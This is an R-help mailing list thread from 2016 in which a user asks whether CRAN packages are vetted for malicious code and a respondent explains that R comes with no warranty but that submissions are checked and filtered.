[R] are R packages safe?
dimitri.liakhovitski at gmail.com
Thu Dec 8 19:16:08 CET 2016
Great to know thanks, Bert!
Do you happen to have a reference that shows that:
-U. Wien checks R packages on submission for malicious code
-R repository servers have filters in place.
On Thu, Dec 8, 2016 at 1:13 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
> On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski
> <dimitri.liakhovitski at gmail.com> wrote:
>> I just thought maybe there is something - about the process of
>> submitting packages or anything like that - that shows that at least
>> some diligence is being done to ensure that a given package is not
>> just a piece of malware from ISIS or Russia.
>> But if you, Bert, say it's not the case, then I'll believe you.
> ** I DID NOT SAY THAT ***
> You asked for **guarantees." R has none. But of course U. Wien checks
> R packages on submission for malicious code (it is one reason binary
> submissions are generally not permitted) and R repository servers of
> course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or
>> I've asked my question after I received the following email from a
>> partner company (that is a SaS company):
>> They are starting to work with R and we are delivering some R code to
>> them that will run in the background. I mentioned that certain R
>> packages have to be installed in order for the code to run and got
>> "I’m also going to assume that our team will want to vet any package
>> you request. We’re big fans of open source and leveraging 3rd party
>> libraries but are keenly aware of the risks in “inviting strangers
>> into your house”."
>> This is why I asked.
>> So, I guess, my response should be - yes, please, go ahead and "vet"
>> them any way you want.
>> Thank you!
>> On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
>>> 1. What does "Safe" mean???
>>> 2. From the R banner on startup:
>>> "R is free software and comes with ABSOLUTELY NO WARRANTY."
>>> Don't think it could be clearer than that!
>>> Bert Gunter
>>> "The trouble with having an open mind is that people keep coming along
>>> and sticking things into it."
>>> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip )
>>> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski
>>> <dimitri.liakhovitski at gmail.com> wrote:
>>>> suddenly, I am being asked for a proof that R packages that are not
>>>> '"base" are safe. I've never been asked this question before.
>>>> Is there some documentation on CRAN that discusses how it's ensured
>>>> that all "official" R packages have been "vetted" and are safe?
>>>> Thanks a lot!
>>>> Dimitri Liakhovitski
>>>> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see
>>>> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html
>>>> and provide commented, minimal, self-contained, reproducible code.
>> Dimitri Liakhovitski
More information about the R-help